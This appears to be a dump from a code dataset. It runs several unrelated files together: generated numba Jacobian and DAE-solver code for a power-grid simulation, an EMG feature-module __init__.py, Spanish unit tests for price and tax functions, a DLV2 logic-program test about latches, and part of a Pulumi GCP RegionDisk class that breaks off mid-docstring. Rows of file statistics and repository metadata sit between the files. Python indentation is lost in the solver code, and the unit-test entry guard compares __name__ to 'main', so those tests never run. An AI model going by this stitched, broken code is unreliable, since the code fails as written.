struct[0].Gy[18,19] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[18,20] = V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[18,21] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[19,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[19,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[19,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + 2*V_POI*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy[19,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy[19,20] = V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[19,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,18] = V_GRID*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,19] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[20,20] = 2*V_GRID*g_POI_GRID + V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[20,21] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[20,25] = -S_n_GRID/S_base
struct[0].Gy[21,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[21,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[21,20] = 2*V_GRID*(-b_POI_GRID - bs_POI_GRID/2) + V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy[21,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy[21,26] = -S_n_GRID/S_base
struct[0].Gy[22,20] = K_p_GRID*(-i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy[22,21] = K_p_GRID*(V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy[22,22] = -1
struct[0].Gy[22,23] = K_p_GRID*(-2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy[22,24] = K_p_GRID*(-2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy[22,27] = K_p_GRID
struct[0].Gy[23,20] = -sin(delta_GRID - theta_GRID)
struct[0].Gy[23,21] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[23,23] = -R_v_GRID
struct[0].Gy[23,24] = X_v_GRID
struct[0].Gy[24,20] = -cos(delta_GRID - theta_GRID)
struct[0].Gy[24,21] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[24,23] = -X_v_GRID
struct[0].Gy[24,24] = -R_v_GRID
struct[0].Gy[25,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[25,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[25,23] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[25,24] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[25,25] = -1
struct[0].Gy[26,20] = i_d_GRID*cos(delta_GRID - theta_GRID) - i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[26,21] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,23] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy[26,24] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy[26,26] = -1
struct[0].Gy[27,22] = -1/Droop_GRID
struct[0].Gy[27,27] = -1
struct[0].Gy[27,29] = K_sec_GRID
struct[0].Gy[28,22] = 1
struct[0].Gy[28,28] = -1
struct[0].Gy[29,28] = -K_p_agc
struct[0].Gy[29,29] = -1
struct[0].Gu[0,0] = -1/S_base
struct[0].Gu[1,1] = -1/S_base
struct[0].Gu[2,2] = -1/S_base
struct[0].Gu[3,3] = -1/S_base
struct[0].Gu[4,4] = -1/S_base
struct[0].Gu[5,5] = -1/S_base
struct[0].Gu[6,6] = -1/S_base
struct[0].Gu[7,7] = -1/S_base
struct[0].Gu[8,8] = -1/S_base
struct[0].Gu[9,9] = -1/S_base
struct[0].Gu[10,10] = -1/S_base
struct[0].Gu[11,11] = -1/S_base
struct[0].Gu[12,12] = -1/S_base
struct[0].Gu[13,13] = -1/S_base
struct[0].Gu[14,14] = -1/S_base
struct[0].Gu[15,15] = -1/S_base
struct[0].Gu[16,16] = -1/S_base
struct[0].Gu[17,17] = -1/S_base
struct[0].Gu[18,18] = -1/S_base
struct[0].Gu[19,19] = -1/S_base
struct[0].Gu[20,20] = -1/S_base
struct[0].Gu[21,21] = -1/S_base
struct[0].Gu[22,23] = K_p_GRID
struct[0].Gu[27,23] = -1
struct[0].Gu[27,24] = 1
struct[0].Gu[27,25] = 1/Droop_GRID
@numba.njit(cache=True)
def Piecewise(arg):
out = arg[0][1]
N = len(arg)
for it in range(N-1,-1,-1):
if arg[it][1]: out = arg[it][0]
return out
@numba.njit(cache=True)
def ITE(arg):
out = arg[0][1]
N = len(arg)
for it in range(N-1,-1,-1):
if arg[it][1]: out = arg[it][0]
return out
@numba.njit(cache=True)
def Abs(x):
return np.abs(x)
@numba.njit(cache=True)
def ini_dae_jacobian_numba(struct,x):
N_x = struct[0].N_x
N_y = struct[0].N_y
struct[0].x[:,0] = x[0:N_x]
struct[0].y_ini[:,0] = x[N_x:(N_x+N_y)]
ini(struct,10)
ini(struct,11)
for row,col in zip(struct[0].Fx_ini_rows,struct[0].Fx_ini_cols):
struct[0].Ac_ini[row,col] = struct[0].Fx_ini[row,col]
for row,col in zip(struct[0].Fy_ini_rows,struct[0].Fy_ini_cols):
struct[0].Ac_ini[row,col+N_x] = struct[0].Fy_ini[row,col]
for row,col in zip(struct[0].Gx_ini_rows,struct[0].Gx_ini_cols):
struct[0].Ac_ini[row+N_x,col] = struct[0].Gx_ini[row,col]
for row,col in zip(struct[0].Gy_ini_rows,struct[0].Gy_ini_cols):
struct[0].Ac_ini[row+N_x,col+N_x] = struct[0].Gy_ini[row,col]
@numba.njit(cache=True)
def ini_dae_problem(struct,x):
N_x = struct[0].N_x
N_y = struct[0].N_y
struct[0].x[:,0] = x[0:N_x]
struct[0].y_ini[:,0] = x[N_x:(N_x+N_y)]
ini(struct,2)
ini(struct,3)
struct[0].fg[:N_x,:] = struct[0].f[:]
struct[0].fg[N_x:,:] = struct[0].g[:]
@numba.njit(cache=True)
def ssate(struct,xy):
for it in range(100):
ini_dae_jacobian_numba(struct,xy[:,0])
ini_dae_problem(struct,xy[:,0])
xy[:] += np.linalg.solve(struct[0].Ac_ini,-struct[0].fg)
if np.max(np.abs(struct[0].fg[:,0]))<1e-8: break
N_x = struct[0].N_x
struct[0].x[:,0] = xy[:N_x,0]
struct[0].y_ini[:,0] = xy[N_x:,0]
return xy,it
@numba.njit(cache=True)
def daesolver(struct):
sin = np.sin
cos = np.cos
sqrt = np.sqrt
i = 0
Dt = struct[i].Dt
N_x = struct[i].N_x
N_y = struct[i].N_y
N_z = struct[i].N_z
decimation = struct[i].decimation
eye = np.eye(N_x)
t = struct[i].t
t_end = struct[i].t_end
if struct[i].it == 0:
run(t,struct, 1)
struct[i].it_store = 0
struct[i]['T'][0] = t
struct[i].X[0,:] = struct[i].x[:,0]
struct[i].Y[0,:] = struct[i].y_run[:,0]
struct[i].Z[0,:] = struct[i].h[:,0]
solver = struct[i].solvern
while t<t_end:
struct[i].it += 1
struct[i].t += Dt
t = struct[i].t
if solver == 5: # Teapezoidal DAE as in Milano's book
run(t,struct, 2)
run(t,struct, 3)
x = np.copy(struct[i].x[:])
y = np.copy(struct[i].y_run[:])
f = np.copy(struct[i].f[:])
g = np.copy(struct[i].g[:])
for iter in range(struct[i].imax):
run(t,struct, 2)
run(t,struct, 3)
run(t,struct,10)
run(t,struct,11)
x_i = struct[i].x[:]
y_i = struct[i].y_run[:]
f_i = struct[i].f[:]
g_i = struct[i].g[:]
F_x_i = struct[i].Fx[:,:]
F_y_i = struct[i].Fy[:,:]
G_x_i = struct[i].Gx[:,:]
G_y_i = struct[i].Gy[:,:]
A_c_i = np.vstack((np.hstack((eye-0.5*Dt*F_x_i, -0.5*Dt*F_y_i)),
np.hstack((G_x_i, G_y_i))))
f_n_i = x_i - x - 0.5*Dt*(f_i+f)
# print(t,iter,g_i)
Dxy_i = np.linalg.solve(-A_c_i,np.vstack((f_n_i,g_i)))
x_i = x_i + Dxy_i[0:N_x]
y_i = y_i + Dxy_i[N_x:(N_x+N_y)]
struct[i].x[:] = x_i
struct[i].y_run[:] = y_i
# [f_i,g_i,F_x_i,F_y_i,G_x_i,G_y_i] = smib_transient(x_i,y_i,u);
# A_c_i = [[eye(N_x)-0.5*Dt*F_x_i, -0.5*Dt*F_y_i],
# [ G_x_i, G_y_i]];
# f_n_i = x_i - x - 0.5*Dt*(f_i+f);
# Dxy_i = -A_c_i\[f_n_i.',g_i.'].';
# x_i = x_i + Dxy_i(1:N_x);
# y_i = y_i + Dxy_i(N_x+1:N_x+N_y);
xy = np.vstack((x_i,y_i))
max_relative = 0.0
for it_var in range(N_x+N_y):
abs_value = np.abs(xy[it_var,0])
if abs_value < 0.001:
abs_value = 0.001
relative_error = np.abs(Dxy_i[it_var,0])/abs_value
if relative_error > max_relative: max_relative = relative_error
if max_relative<struct[i].itol:
break
# if iter>struct[i].imax-2:
# print('Convergence problem')
struct[i].x[:] = x_i
struct[i].y_run[:] = y_i
# channels
if struct[i].store == 1:
it_store = struct[i].it_store
if struct[i].it >= it_store*decimation:
struct[i]['T'][it_store+1] = t
struct[i].X[it_store+1,:] = struct[i].x[:,0]
struct[i].Y[it_store+1,:] = struct[i].y_run[:,0]
struct[i].Z[it_store+1,:] = struct[i].h[:,0]
struct[i].iters[it_store+1,0] = iter
struct[i].it_store += 1
struct[i].t = t
return t
def nonzeros():
Fx_ini_rows = [0, 1, 2]
Fx_ini_cols = [0, 0, 2]
Fy_ini_rows = [0, 0, 1, 1, 1, 1, 1, 2, 3]
Fy_ini_cols = [22, 28, 20, 21, 23, 24, 27, 26, 28]
Gx_ini_rows = [22, 22, 23, 24, 24, 25, 26, 29]
Gx_ini_cols = [0, 1, 0, 0, 2, 0, 0, 3]
Gy_ini_rows = [0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 11, 11, 11, 11, 11, 11, 11, 11, 12, 12, 12, 12, 12, 12, 12, 12, 13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15, 15, 15, 15, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 17, 18, 18, 18, 18, 18, 18, 19, 19, 19, 19, 19, 19, 20, 20, 20, 20, 20, 21, 21, 21, 21, 21, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 24, 24, 24, 24, 25, 25, 25, 25, 25, 26, 26, 26, 26, 26, 27, 27, 27, 28, 28, 29, 29]
Gy_ini_cols = [0, 1, 8, 9, 0, 1, 8, 9, 2, 3, 10, 11, 2, 3, 10, 11, 4, 5, 12, 13, 4, 5, 12, 13, 6, 7, 16, 17, 6, 7, 16, 17, 0, 1, 8, 9, 10, 11, 0, 1, 8, 9, 10, 11, 2, 3, 8, 9, 10, 11, 12, 13, 2, 3, 8, 9, 10, 11, 12, 13, 4, 5, 10, 11, 12, 13, 14, 15, 4, 5, 10, 11, 12, 13, 14, 15, 12, 13, 14, 15, 16, 17, 18, 19, 12, 13, 14, 15, 16, 17, 18, 19, 6, 7, 14, 15, 16, 17, 6, 7, 14, 15, 16, 17, 14, 15, 18, 19, 20, 21, 14, 15, 18, 19, 20, 21, 18, 19, 20, 21, 25, 18, 19, 20, 21, 26, 20, 21, 22, 23, 24, 27, 20, 21, 23, 24, 20, 21, 23, 24, 20, 21, 23, 24, 25, 20, 21, 23, 24, 26, 22, 27, 29, 22, 28, 28, 29]
return Fx_ini_rows,Fx_ini_cols,Fy_ini_rows,Fy_ini_cols,Gx_ini_rows,Gx_ini_cols,Gy_ini_rows,Gy_ini_cols
| 74.089392
| 799
| 0.665835
| 35,462
| 186,483
| 3.117873
| 0.009785
| 0.099144
| 0.050712
| 0.033971
| 0.946494
| 0.928459
| 0.916484
| 0.901163
| 0.892562
| 0.885408
| 0
| 0.082997
| 0.180617
| 186,483
| 2,517
| 800
| 74.089392
| 0.640598
| 0.012511
| 0
| 0.738701
| 0
| 0
| 0.012139
| 0.000979
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02354
| false
| 0
| 0.001883
| 0.000942
| 0.039548
| 0.003766
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7eb196a7c0cd188ce7415cb9be7e2b606c30f1de
| 1,778
|
py
|
Python
|
axopy/features/__init__.py
|
agamemnonc/axopy
|
e8c324a4ecfc0abdec3016bca62dcf84d371b6c0
|
[
"MIT"
] | 2
|
2019-11-13T08:04:27.000Z
|
2019-12-04T16:30:40.000Z
|
axopy/features/__init__.py
|
intellsensing/axopy
|
e8c324a4ecfc0abdec3016bca62dcf84d371b6c0
|
[
"MIT"
] | 4
|
2019-10-15T09:20:34.000Z
|
2020-04-10T12:42:01.000Z
|
axopy/features/__init__.py
|
agamemnonc/axopy
|
e8c324a4ecfc0abdec3016bca62dcf84d371b6c0
|
[
"MIT"
] | 3
|
2020-07-09T00:52:28.000Z
|
2022-03-01T16:44:00.000Z
|
from axopy.features.classes import (MeanAbsoluteValue, MeanValue,
WaveformLength, WilsonAmplitude,
ZeroCrossing, SlopeSignChanges,
RootMeanSquare, IntegratedEMG, Var, LogVar,
Skewness, Kurtosis, AR, SampleEntropy,
Hjorth, Histogram)
from axopy.features.time import (mean_absolute_value, mean_value,
waveform_length, wilson_amplitude,
zero_crossings, slope_sign_changes,
root_mean_square, integrated_emg, var, logvar,
skewness, kurtosis, ar, sample_entropy,
hjorth, histogram)
__all__ = ['MeanAbsoluteValue',
'MeanValue',
'WaveformLength',
'WilsonAmplitude',
'ZeroCrossing',
'SlopeSignChanges',
'RootMeanSquare',
'IntegratedEMG',
'Var',
'LogVar',
'Skewness',
'Kurtosis',
'AR',
'SampleEntropy',
'Hjorth',
'Histogram',
'mean_absolute_value',
'mean_value',
'waveform_length',
'wilson_amplitude',
'zero_crossings',
'slope_sign_changes',
'root_mean_square',
'integrated_emg',
'var',
'logvar',
'skewness',
'kurtosis',
'ar',
'sample_entropy',
'hjorth',
'histogram']
# FIXME: fix string formatting in docstrings
import numpy
try:
numpy.set_printoptions(legacy='1.13')
except TypeError:
pass
| 33.54717
| 79
| 0.477503
| 117
| 1,778
| 7.008547
| 0.487179
| 0.043902
| 0.082927
| 0.121951
| 0.807317
| 0.807317
| 0.807317
| 0.807317
| 0.807317
| 0.807317
| 0
| 0.003012
| 0.43982
| 1,778
| 52
| 80
| 34.192308
| 0.820281
| 0.023622
| 0
| 0
| 0
| 0
| 0.200115
| 0
| 0
| 0
| 0
| 0.019231
| 0
| 1
| 0
| false
| 0.020408
| 0.061224
| 0
| 0.061224
| 0.020408
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e511f72d2333420e79ed1635bd52323434d0583
| 2,676
|
py
|
Python
|
pruebas.py
|
DSAZ1324/ProyectoProgramacionCorte120191
|
6e37c77c03953398f51947374a3e8b3b3bf398bf
|
[
"MIT"
] | null | null | null |
pruebas.py
|
DSAZ1324/ProyectoProgramacionCorte120191
|
6e37c77c03953398f51947374a3e8b3b3bf398bf
|
[
"MIT"
] | null | null | null |
pruebas.py
|
DSAZ1324/ProyectoProgramacionCorte120191
|
6e37c77c03953398f51947374a3e8b3b3bf398bf
|
[
"MIT"
] | null | null | null |
import unittest
import funciones as f
class pruebas(unittest.TestCase):
def test_calcular_precio_producto(self):
self.assertEqual(f.calcular_precio_producto(1000), 1500)
self.assertEqual(f.calcular_precio_producto(0), 0)
def test_calcular_precio_servicio(self):
self.assertEqual(f.calcular_precio_servicio(3), 300000)
self.assertEqual(f.calcular_precio_servicio(0), 0)
def test_calcular_precio_servicio_extras(self):
self.assertEqual(f.calcular_precio_servicio_extras(5), 625000)
self.assertEqual(f.calcular_precio_servicio_extras(0), 0)
def test_calcular_costo_envio(self):
self.assertEqual(f.calcular_costo_envio(100), 11500)
self.assertEqual(f.calcular_costo_envio(0), 0)
def test_calcular_precio_producto_fuera(self):
self.assertEqual(f.calcular_precio_producto_fuera(5000, 50), 13250)
self.assertEqual(f.calcular_precio_producto_fuera(0, 0), 0)
self.assertEqual(f.calcular_precio_producto_fuera(5000, 0), 7500)
self.assertEqual(f.calcular_precio_producto_fuera(0, 60), 6900)
def test_calcular_iva_producto(self):
self.assertEqual(f.calcular_iva_producto(10000, 0.19), 1900)
self.assertEqual(f.calcular_iva_producto(250000, 0.19), 47500)
self.assertEqual(f.calcular_iva_producto(0, 0), 0)
def test_calcular_iva_servicio(self):
self.assertEqual(f.calcular_iva_servicio(5, 19), 95000)
self.assertEqual(f.calcular_iva_servicio(0, 0), 0)
self.assertEqual(f.calcular_iva_servicio(5, 0), 0)
self.assertEqual(f.calcular_iva_servicio(0, 19), 0)
def test_calcular_iva_envio(self):
self.assertEqual(f.calcular_iva_envio(10000, 19), 1900)
self.assertEqual(f.calcular_iva_envio(100000, 19), 19000)
self.assertEqual(f.calcular_iva_envio(0, 0), 0)
def test_calcular_iva_servicio_extra(self):
self.assertEqual(f.calcular_iva_servicio_extra(5, 19), 118750)
self.assertEqual(f.calcular_iva_servicio_extra(0, 0), 0)
self.assertEqual(f.calcular_iva_servicio_extra(0, 19), 0)
self.assertEqual(f.calcular_iva_servicio_extra(5, 0), 0)
def test_calcular_recaudo_locales(self):
self.assertEqual(f.calcular_recaudo_locales(1, 2, 3, 4), 100000)
def test_calcular_recaudo_horas_extra(self):
self.assertEqual(f.calcular_recaudo_horas_extra(1, 2, 3, 4), 1250000)
self.assertEqual(f.calcular_recaudo_horas_extra(0, 0, 0, 0), 0)
self.assertEqual(f.calcular_recaudo_horas_extra(1, 2, 3, 0), 750000)
def test_calcular_recaudo_mixto_local(self):
pass
if __name__ == 'main':
unittest.main()
| 41.169231
| 77
| 0.72571
| 378
| 2,676
| 4.825397
| 0.15873
| 0.246711
| 0.263158
| 0.394737
| 0.815789
| 0.770833
| 0.550987
| 0.3125
| 0.089912
| 0.048246
| 0
| 0.088262
| 0.165919
| 2,676
| 64
| 78
| 41.8125
| 0.728943
| 0
| 0
| 0
| 0
| 0
| 0.001495
| 0
| 0
| 0
| 0
| 0
| 0.625
| 1
| 0.25
| false
| 0.020833
| 0.041667
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e51e248404e975671dba9c6ca9d775f13970099
| 2,463
|
py
|
Python
|
tests/parser/others.esra.suitcase.a.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/others.esra.suitcase.a.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/others.esra.suitcase.a.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
% Date: Wed, 15 Jul 1998 15:11:06 -0500 (CDT)
% From: Esra Erdem <esra@cs.utexas.edu>
% To: Gerald Pfeifer <pfeifer@dbai.tuwien.ac.at>
% Subject: Re: experimentation
up(L,T1) :- latch(L), next(T,T1), up(L,T), not nup(L,T1).
nup(L,T1) :- latch(L), next(T,T1), nup(L,T), not up(L,T1).
open(T1) :- next(T,T1), open(T), not nopen(T1).
nopen(T1) :- next(T,T1), nopen(T), not open(T1).
up(L,T1) :- latch(L), next(T,T1), toggle(L,T), nup(L,T).
nup(L,T1) :- latch(L), next(T,T1), toggle(L,T), up(L,T).
open(T) :- up(l1,T), up(l2,T).
up(L,0) :- latch(L), not nup(L,0).
nup(L,0) :- latch(L), not up(L,0).
open(0) :- not nopen(0).
nopen(0) :- not open(0).
toggle(L,T) :- latch(L), time(T), not last(T), not ntoggle(L,T).
ntoggle(L,T) :- latch(L), time(T), not last(T), not toggle(L,T).
latch(l1).
latch(l2).
time(0).
time(1).
time(2).
last(2).
next(0,1).
next(1,2).
% find all stable models containing open(2) but not any of the following:
% up(l1,0), up(l2,0), open(0), up(l1,2), up(l2,2)
% compute all {open(2), not up(l1,0), not up(l2,0), not open(0), not
% up(l1,2), not up(l2,2)}
open(2)? %, not up(l1,0), not up(l2,0), not open(0), not up(l1,2), not up(l2,2)?
"""
output = """
% Date: Wed, 15 Jul 1998 15:11:06 -0500 (CDT)
% From: Esra Erdem <esra@cs.utexas.edu>
% To: Gerald Pfeifer <pfeifer@dbai.tuwien.ac.at>
% Subject: Re: experimentation
up(L,T1) :- latch(L), next(T,T1), up(L,T), not nup(L,T1).
nup(L,T1) :- latch(L), next(T,T1), nup(L,T), not up(L,T1).
open(T1) :- next(T,T1), open(T), not nopen(T1).
nopen(T1) :- next(T,T1), nopen(T), not open(T1).
up(L,T1) :- latch(L), next(T,T1), toggle(L,T), nup(L,T).
nup(L,T1) :- latch(L), next(T,T1), toggle(L,T), up(L,T).
open(T) :- up(l1,T), up(l2,T).
up(L,0) :- latch(L), not nup(L,0).
nup(L,0) :- latch(L), not up(L,0).
open(0) :- not nopen(0).
nopen(0) :- not open(0).
toggle(L,T) :- latch(L), time(T), not last(T), not ntoggle(L,T).
ntoggle(L,T) :- latch(L), time(T), not last(T), not toggle(L,T).
latch(l1).
latch(l2).
time(0).
time(1).
time(2).
last(2).
next(0,1).
next(1,2).
% find all stable models containing open(2) but not any of the following:
% up(l1,0), up(l2,0), open(0), up(l1,2), up(l2,2)
% compute all {open(2), not up(l1,0), not up(l2,0), not open(0), not
% up(l1,2), not up(l2,2)}
open(2)? %, not up(l1,0), not up(l2,0), not open(0), not up(l1,2), not up(l2,2)?
"""
| 26.483871
| 81
| 0.559886
| 520
| 2,463
| 2.651923
| 0.109615
| 0.029007
| 0.060914
| 0.052212
| 0.992023
| 0.992023
| 0.992023
| 0.992023
| 0.992023
| 0.992023
| 0
| 0.080828
| 0.176208
| 2,463
| 92
| 82
| 26.771739
| 0.598817
| 0
| 0
| 0.96875
| 0
| 0.28125
| 0.986947
| 0.022737
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
0e7716b0317f11673a59e425e2adbab86abc0266
| 66,569
|
py
|
Python
|
sdk/python/pulumi_gcp/compute/region_disk.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/compute/region_disk.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/compute/region_disk.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RegionDiskArgs', 'RegionDisk']
@pulumi.input_type
class RegionDiskArgs:
def __init__(__self__, *,
replica_zones: pulumi.Input[Sequence[pulumi.Input[str]]],
description: Optional[pulumi.Input[str]] = None,
disk_encryption_key: Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']] = None,
interface: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
snapshot: Optional[pulumi.Input[str]] = None,
source_snapshot_encryption_key: Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']] = None,
type: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a RegionDisk resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] replica_zones: URLs of the zones where the disk should be replicated to.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input['RegionDiskDiskEncryptionKeyArgs'] disk_encryption_key: Encrypts the disk using a customer-supplied encryption key.
After you encrypt a disk with a customer-supplied key, you must
provide the same key if you use the disk later (e.g. to create a disk
snapshot or an image, or to attach the disk to a virtual machine).
Customer-supplied encryption keys do not protect access to metadata of
the disk.
If you do not provide an encryption key when creating the disk, then
the disk will be encrypted using an automatically generated key and
you do not need to provide a key to use the disk later.
Structure is documented below.
:param pulumi.Input[str] interface: Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this disk. A list of key->value pairs.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[int] physical_block_size_bytes: Physical block size of the persistent disk, in bytes. If not present
in a request, a default value is used. Currently supported sizes
are 4096 and 16384, other sizes may be added in the future.
If an unsupported value is requested, the error message will list
the supported values for the caller's project.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: A reference to the region where the disk resides.
:param pulumi.Input[int] size: Size of the persistent disk, specified in GB. You can specify this
field when creating a persistent disk using the sourceImage or
sourceSnapshot parameter, or specify it alone to create an empty
persistent disk.
If you specify this field along with sourceImage or sourceSnapshot,
the value of sizeGb must not be less than the size of the sourceImage
or the size of the snapshot.
:param pulumi.Input[str] snapshot: The source snapshot used to create this disk. You can provide this as
a partial or full URL to the resource. For example, the following are
valid values:
